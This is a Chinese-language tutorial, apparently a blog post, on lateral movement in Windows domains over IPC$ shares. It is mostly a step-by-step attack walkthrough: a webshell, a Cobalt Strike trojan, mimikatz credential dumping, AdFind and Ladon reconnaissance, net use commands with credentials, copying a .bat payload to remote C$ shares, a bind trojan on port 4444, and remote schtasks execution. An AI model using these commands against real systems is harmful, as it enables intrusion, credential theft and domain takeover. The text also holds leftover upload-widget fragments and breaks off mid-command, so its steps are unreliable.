域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。
通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
横向移动手法
IPC
简介:IPC是专用管道,可以实现对远程计算机的访问,
条件:需要使用目标系统用户的账号密码,使用139、445端口。
利用流程:
1. 建立IPC链接到目标主机
2. 拷贝要执行的命令脚本到目标主机
3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4. 删除IPC链接
演示:
横向移动
测试环境:192.168.224.129代替192.168.46.146
通过外网网站渗透拿到一个webs hell,然后连接菜刀
上传一个cs生成的木马,菜刀执行这个马,cs上线,提权这个上线的目标以获取更多信息。
下一步:信息收集-上传Ladon64.exe,AdFind.exe-
ipconfig #查看内网网段
shell ladon64.exe 192.168.3.0/24 onlinepc #3网段存活主机扫描
shell AdFind -sc dolist #获取域控名称
ping 域控得到域控IP
shell AdFind -users name #获取域内所有用户名
正在上传…重新上传取消正在上传…重新上传取消正在上传…重新上传取消
net view #查看存活主机
run mimkaz #获取密文/明文/密码
信息收集-确定每台机器的角色
下一步:ipc横向渗透
利用流程
IPC是专用管道,可以实现对远程计算机的访问,
前提条件:需要使用目标系统用户的账号密码,使用139、445端口。
1. 建立IPC链接到目标主机
2. 拷贝要执行的命令脚本到目标主机
3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4. 删除IPC链接
net use \\server\ipc$ "password" /user:username # 工作组
net use \\server\ipc$ "password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除IPC
net view xx.xx.xx.xx # 查看对方共享
#建立IPC常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
#建立IPC失败的原因
(1)目标系统不是NT或以上的操作系统
(2)对方没有打开IPC$共享
(3)对方未开启139、445端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
绑定本地4444,执行该木马后把数据给到本机的4444端口,然后用一台可以访问它的机器去连接它。
然后把这个木马上传到web server这台机器上,然后复制文件到ipc连接的机器上
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
schtasks /create /s 192.168.3.32 /ru